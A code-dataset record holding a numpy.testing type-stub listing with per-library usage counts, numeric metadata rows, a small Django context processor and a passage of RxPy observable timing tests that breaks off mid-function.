def assert_equal(actual: numpy.uint64, desired: numpy.float64):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: numpy.float64):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.complex64, desired: numpy.complex128):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int64]):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: scipy.sparse.csc.csc_matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.longlong, desired: numpy.longlong):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.longlong], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ulonglong, desired: numpy.ulonglong):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.ulonglong], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.sparse.dok.dok_matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.sparse.lil.lil_matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.matrix, desired: List[List[int]], err_msg: str):
"""
usage.scipy: 16
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: float, verbose: bool):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[Literal["MT19937"], numpy.ndarray, int, int, float],
desired: Tuple[Literal["MT19937"], numpy.ndarray, int, int, float],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: Tuple[float, int], desired: Tuple[numpy.float64, numpy.int64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: list, desired: list):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: dict, desired: dict):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Tuple[int, int]], desired: List[Tuple[int, int]]):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(
actual: List[Tuple[Union[None, int], ...]],
desired: List[Tuple[Union[None, int], ...]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: int, err_msg: Literal["(0.25, 0.25, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: int, err_msg: Literal["(0.75, 0.75, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: int, err_msg: Literal["(0.3, 0.2, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[set], desired: List[set], err_msg: str):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: List[Tuple[int, int, int]], desired: List[Tuple[int, int, int]]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: List[Tuple[int, int, int, int]], desired: List[Tuple[int, int, int, int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[int, int, int, int, int]],
desired: List[Tuple[int, int, int, int, int]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Tuple[int, ...]], desired: List[Tuple[int, ...]]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(
actual: List[Tuple[Tuple[int, int], Tuple[int, int]]],
desired: List[Tuple[Tuple[int, int], Tuple[int, int]]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[List[numpy.int64]], desired: List[List[numpy.int64]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[List[int]], desired: List[List[int]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.complex128, desired: complex):
"""
usage.scipy: 26
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, float]
):
"""
usage.scipy: 20
"""
...
@overload
def assert_equal(actual: scipy.special.orthogonal.orthopoly1d, desired: numpy.poly1d):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Dict[str, Literal["ignore"]], desired: Dict[str, Literal["ignore"]]
):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.complex128, desired: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[numpy.ndarray], desired: List[numpy.ndarray]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[float, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[numpy.float64, numpy.float64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[int, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[float, int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int], desired: List[int], err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[numpy.int64, numpy.int64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[float, float]
):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[float, float, float, float],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: List[numpy.ndarray], desired: List[float]):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[Union[float, int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float], desired: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["a"], desired: Literal["a"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["a, b"], desired: Literal["a, b"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float], desired: scipy.stats.morestats.BartlettResult
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float], desired: scipy.stats.morestats.FlignerResult
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[Tuple[numpy.ndarray, numpy.ndarray], Tuple[float, float, float]],
desired: Tuple[Tuple[numpy.ndarray, numpy.ndarray], Tuple[float, float, float]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
Tuple[numpy.ndarray, numpy.ndarray], Tuple[numpy.float64, numpy.float64, float]
],
desired: Tuple[Tuple[numpy.ndarray, numpy.ndarray], Tuple[float, float, float]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.morestats.WilcoxonResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.int64):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.morestats.WilcoxonResult,
desired: scipy.stats.morestats.WilcoxonResult,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: scipy.stats.morestats.WilcoxonResult,
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float, float, None], desired: Tuple[float, float, float, None]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Literal["Dimension mismatch"], desired: Literal["Dimension mismatch"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.SpearmanrResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.mstats_basic.SpearmanrResult,
desired: scipy.stats.stats.SpearmanrResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.KendalltauResult, desired: Tuple[float, float]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[Union[float, int]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: Tuple[numpy.int32, numpy.int32]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.str_, desired: Literal["showers"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.stats.stats.ModeResult, desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.stats.mstats_basic.ModeResult, desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Union[int, float]]):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.ma.core.MaskedArray, desired: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[float], desired: Type[float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, int]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_relResult, desired: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_relResult,
desired: Tuple[List[Union[float, int]], List[Union[float, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_indResult, desired: Tuple[float, float]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_indResult,
desired: Tuple[List[Union[float, int]], List[Union[float, int]]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_1sampResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_1sampResult,
desired: Tuple[List[Union[float, int]], List[Union[float, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[List[float], List[float]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ma.core.MaskedArray, numpy.ma.core.MaskedArray],
desired: Tuple[float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.int64, numpy.int64], desired: Tuple[numpy.int64, numpy.int64]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: None):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[float], desired: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.F_onewayResult, desired: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: scipy.stats.stats.KruskalResult, desired: Tuple[float, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[numpy.ndarray], desired: numpy.ndarray):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x"]]], Tuple[None, ...]],
desired: Tuple[List[Tuple[Literal["x"]]], Tuple[None, ...]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x"], Literal["y"]]], Tuple[None, ...]],
desired: Tuple[List[Tuple[Literal["x"], Literal["y"]]], Tuple[None, ...]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x", "y"]]], Tuple[None, ...]],
desired: Tuple[List[Tuple[Literal["x", "y"]]], Tuple[None, ...]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x"]]], Tuple[Literal["y"]]],
desired: Tuple[List[Tuple[Literal["x"]]], Tuple[Literal["y"]]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
List[Tuple[Literal["x"]]], List[Tuple[Union[Literal["y"], None], ...]]
],
desired: Tuple[
List[Tuple[Literal["x"]]], List[Tuple[Union[Literal["y"], None], ...]]
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
List[Tuple[Union[None, Literal["c", "b", "a", "d"]], ...]],
Tuple[Literal["d"], Literal["e"]],
],
desired: Tuple[
List[Tuple[Union[None, Literal["c", "b", "a", "d"]], ...]],
Tuple[Literal["d"], Literal["e"]],
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(actual: numpy.bool_, desired: numpy.ndarray):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.bool_):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], numpy.int64], Tuple[numpy.ndarray]],
]
],
desired: List[
Tuple[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], int], Tuple[numpy.ndarray]],
]
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], numpy.int64, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
]
],
desired: List[
Tuple[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], int, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
]
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], numpy.int64], Tuple[numpy.ndarray]],
],
desired: Dict[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], int], Tuple[List[int]]],
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], int, numpy.int64],
Tuple[slice[None, None, None], numpy.ndarray],
],
],
desired: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], int, int],
Tuple[slice[None, None, None], List[int]],
],
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], numpy.int64, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
],
desired: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], numpy.int64, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
],
):
"""
usage.dask: 2
"""
...
@overload
def assert_equal(actual: Tuple[int, float, float], desired: Tuple[int, float, float]):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, float, float], desired: Tuple[int, int, float, float]
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[
Dict[
Literal["kernel", "gamma", "C", "degree"],
Union[Literal["rbf", "poly"], float, int],
]
],
],
],
desired: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[
Dict[
Literal["kernel", "gamma", "C", "degree"],
Union[Literal["rbf", "poly"], float, int],
]
],
],
],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_equal(
actual: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[Dict[Literal["C", "gamma"], numpy.float64]],
],
],
desired: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[Dict[Literal["C", "gamma"], numpy.float64]],
],
],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_equal(
actual: Dict[
str,
Union[
numpy.ndarray, numpy.ma.core.MaskedArray, List[Dict[Literal["C"], float]]
],
],
desired: Dict[
str,
Union[
numpy.ndarray, numpy.ma.core.MaskedArray, List[Dict[Literal["C"], float]]
],
],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_equal(
actual: List[Tuple[numpy.ndarray, numpy.ndarray]],
desired: List[Tuple[numpy.ndarray, numpy.ndarray]],
):
"""
usage.sklearn: 19
"""
...
def assert_equal(
actual: object, desired: object, err_msg: Union[int, str] = ..., verbose: bool = ...
):
"""
usage.dask: 26
usage.matplotlib: 12
usage.scipy: 4569
usage.skimage: 630
usage.sklearn: 27
usage.xarray: 40
"""
...
@overload
def assert_no_warnings():
"""
usage.skimage: 1
"""
...
@overload
def assert_no_warnings(*args: Literal["v", "t"]):
"""
usage.sklearn: 1
"""
...
def assert_no_warnings(*args: Literal["v", "t"]):
"""
usage.skimage: 1
usage.sklearn: 1
"""
...
def assert_string_equal(actual: str, desired: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(warning_class: Type[UserWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 2
usage.skimage: 3
"""
...
@overload
def assert_warns(warning_class: Type[FutureWarning], *args: Literal["v", "t"]):
"""
usage.skimage: 1
"""
...
@overload
def assert_warns(warning_class: Type[RuntimeWarning]):
"""
usage.skimage: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.cluster.hierarchy.ClusterWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(warning_class: Type[numpy.ComplexWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.linalg._matfuncs_inv_ssq.LogmExactlySingularWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.linalg._matfuncs_inv_ssq.LogmNearlySingularWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.odr.odrpack.OdrWarning], *args: Literal["v", "t"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.optimize.optimize.OptimizeWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.optimize.linesearch.LineSearchWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[DeprecationWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(warning_class: Type[scipy.optimize.optimize.OptimizeWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[RuntimeWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 6
"""
...
@overload
def assert_warns(warning_class: Type[numpy.VisibleDeprecationWarning]):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.PearsonRConstantInputWarning]):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.stats.stats.PearsonRNearConstantInputWarning],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.SpearmanRConstantInputWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.F_onewayConstantInputWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.F_onewayBadInputSizesWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(
warning_class: Type[sklearn.exceptions.ConvergenceWarning], *args: Literal["v", "t"]
):
"""
usage.sklearn: 1
"""
...
def assert_warns(
warning_class: Union[Type[sklearn.exceptions.ConvergenceWarning], type],
*args: Literal["v", "t"],
):
"""
usage.scipy: 39
usage.skimage: 5
usage.sklearn: 1
"""
...
class suppress_warnings:
@overload
def filter(self, /, message: str):
"""
usage.scipy: 7
"""
...
@overload
def filter(self, /, category: Type[DeprecationWarning]):
"""
usage.scipy: 5
"""
...
@overload
def filter(
self, /, category: Type[RuntimeWarning], message: Literal["divide by zero"]
):
"""
usage.scipy: 2
"""
...
@overload
def filter(self, /, category: Type[RuntimeWarning], message: str):
"""
usage.scipy: 7
"""
...
@overload
def filter(self, /, message: Literal["Got unexpected kwarg"]):
"""
usage.scipy: 1
"""
...
@overload
def filter(
self, /, category: Type[DeprecationWarning], message: Literal[".*frechet_"]
):
"""
usage.scipy: 5
"""
...
@overload
def filter(
self, /, category: Type[UserWarning], message: Literal["p-value floored"]
):
"""
usage.scipy: 2
"""
...
@overload
def filter(
self, /, category: Type[UserWarning], message: Literal["p-value capped"]
):
"""
usage.scipy: 2
"""
...
@overload
def filter(self, /, category: Type[UserWarning], message: str):
"""
usage.scipy: 6
"""
...
def filter(self, /, category: type = ..., message: str = ...):
"""
usage.scipy: 37
"""
...
@overload
def record(self, /, message: str):
"""
usage.scipy: 1
"""
...
@overload
def record(self, /, message: Literal["Got unexpected kwarg"]):
"""
usage.scipy: 1
"""
...
def record(self, /, message: str):
"""
usage.scipy: 2
"""
...
| 16.199742
| 88
| 0.579712
| 43,331
| 376,563
| 4.931296
| 0.018624
| 0.096706
| 0.181713
| 0.10732
| 0.962874
| 0.949461
| 0.936797
| 0.922926
| 0.899821
| 0.849746
| 0.000003
| 0.028724
| 0.247982
| 376,563
| 23,244
| 89
| 16.200439
| 0.725809
| 0.113107
| 0
| 0.80867
| 0
| 0
| 0.047989
| 0
| 0
| 0
| 0
| 0
| 0.202719
| 1
| 0.203867
| false
| 0
| 0.000088
| 0
| 0.204044
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
79e8fd6a6e73a7c2ce2be58a0981b331b5ef3dfd
| 187
|
py
|
Python
|
hsv_dot_beer/context_processors.py
|
hsv-dot-beer/hsvdotbeer
|
e1a086e99f75a30a9ebf6745e7229d6e688dd346
|
[
"Apache-2.0"
] | 18
|
2018-12-06T01:46:37.000Z
|
2021-10-17T10:37:17.000Z
|
hsv_dot_beer/context_processors.py
|
hsv-dot-beer/hsvdotbeer
|
e1a086e99f75a30a9ebf6745e7229d6e688dd346
|
[
"Apache-2.0"
] | 194
|
2018-11-04T12:50:49.000Z
|
2022-01-06T22:43:43.000Z
|
hsv_dot_beer/context_processors.py
|
hsv-dot-beer/hsvdotbeer
|
e1a086e99f75a30a9ebf6745e7229d6e688dd346
|
[
"Apache-2.0"
] | 7
|
2019-03-18T05:36:06.000Z
|
2020-12-25T03:27:29.000Z
|
from django.conf import settings
from django.http import HttpRequest
def add_al_dot_beer_to_context(request: HttpRequest):
return {"alabama_dot_beer": settings.IS_ALABAMA_DOT_BEER}
| 26.714286
| 61
| 0.828877
| 28
| 187
| 5.178571
| 0.642857
| 0.144828
| 0.193103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106952
| 187
| 6
| 62
| 31.166667
| 0.868263
| 0
| 0
| 0
| 0
| 0
| 0.085562
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
79eb636dbd039975998680afbabe8ab93ca17af5
| 89,812
|
py
|
Python
|
tests/test_observable_time.py
|
rlugojr/RxPy
|
9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec
|
[
"ECL-2.0",
"Apache-2.0"
] | 78
|
2015-01-22T23:57:01.000Z
|
2021-06-04T15:16:22.000Z
|
tests/test_observable_time.py
|
rlugojr/RxPy
|
9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2015-10-19T12:59:57.000Z
|
2015-10-19T12:59:57.000Z
|
tests/test_observable_time.py
|
rlugojr/RxPy
|
9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec
|
[
"ECL-2.0",
"Apache-2.0"
] | 11
|
2015-02-16T20:43:45.000Z
|
2018-05-30T11:46:50.000Z
|
import logging
from datetime import datetime, timedelta
from rx import Observable
from rx.testing import TestScheduler, ReactiveTest, is_prime, MockDisposable
from rx.disposables import Disposable, SerialDisposable
FORMAT = '%(asctime)-15s %(threadName)s %(message)s'
logging.basicConfig(filename='rx.log', format=FORMAT, level=logging.DEBUG)
#logging.basicConfig(format=FORMAT, level=logging.DEBUG)
log = logging.getLogger('Rx')
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class RxException(Exception):
pass
# Helper function for raising exceptions within lambdas
def _raise(ex):
raise RxException(ex)
def test_window_with_time_or_count_basic():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
def projection(w, i):
def inner_proj(x):
log.info("%s %s" % (i, x))
return "%s %s" % (i, x)
return w.select(inner_proj)
return xs.window_with_time_or_count(70, 3, scheduler).select(projection).merge_observable()
results = scheduler.start(create)
results.messages.assert_equal(on_next(205, "0 1"), on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "1 4"), on_next(320, "2 5"), on_next(350, "2 6"), on_next(370, "2 7"), on_next(420, "3 8"), on_next(470, "4 9"), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_window_with_time_or_count_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_error(600, ex))
def create():
def projection(w, i):
def inner_proj(x):
return "%s %s" % (i, x)
return w.select(inner_proj)
return xs.window_with_time_or_count(70, 3, scheduler).select(projection).merge_observable()
results = scheduler.start(create)
results.messages.assert_equal(on_next(205, "0 1"), on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "1 4"), on_next(320, "2 5"), on_next(350, "2 6"), on_next(370, "2 7"), on_next(420, "3 8"), on_next(470, "4 9"), on_error(600, ex))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_window_with_time_or_count_disposed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
def projection(w, i):
def inner_proj(x):
return "%s %s" % (i, x)
return w.select(inner_proj)
return xs.window_with_time_or_count(70, 3, scheduler).select(projection).merge_observable()
results = scheduler.start(create, disposed=370)
results.messages.assert_equal(on_next(205, "0 1"), on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "1 4"), on_next(320, "2 5"), on_next(350, "2 6"), on_next(370, "2 7"))
xs.subscriptions.assert_equal(subscribe(200, 370))
def test_buffer_with_time_or_count_basic():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
return xs.buffer_with_time_or_count(70, 3, scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, "1,2,3"), on_next(310, "4"), on_next(370, "5,6,7"), on_next(440, "8"), on_next(510, "9"), on_next(580, ""), on_next(600, ""), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_or_count_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_error(600, ex))
def create():
return xs.buffer_with_time_or_count(70, 3, scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, "1,2,3"), on_next(310, "4"), on_next(370, "5,6,7"), on_next(440, "8"), on_next(510, "9"), on_next(580, ""), on_error(600, ex))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_or_count_disposed():
scheduler = TestScheduler()
